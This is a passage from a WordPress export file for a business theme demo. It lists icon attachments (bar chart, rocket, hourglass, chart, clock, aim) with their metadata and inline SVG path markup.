9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bars-chart</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/bars-chart/</link>
		<pubDate>Wed, 09 Sep 2020 07:44:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bars-chart.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>648</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:44:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:44:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bars-chart]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bars-chart.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bars-chart.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>rocket</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/rocket/</link>
		<pubDate>Wed, 09 Sep 2020 07:46:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/rocket.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>649</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:46:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:46:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[rocket]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/rocket.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/rocket.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>hourglass</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/hourglass/</link>
		<pubDate>Wed, 09 Sep 2020 07:46:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/hourglass.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>650</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:46:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:46:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[hourglass]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/hourglass.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/hourglass.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/chart/</link>
		<pubDate>Wed, 09 Sep 2020 08:11:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>653</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:11:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:11:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>clock</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/clock/</link>
		<pubDate>Wed, 09 Sep 2020 08:23:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/clock.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>659</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:23:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:23:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[clock]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/clock.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/clock.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>aim</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/aim/</link>
		<pubDate>Wed, 09 Sep 2020 08:24:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/aim.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
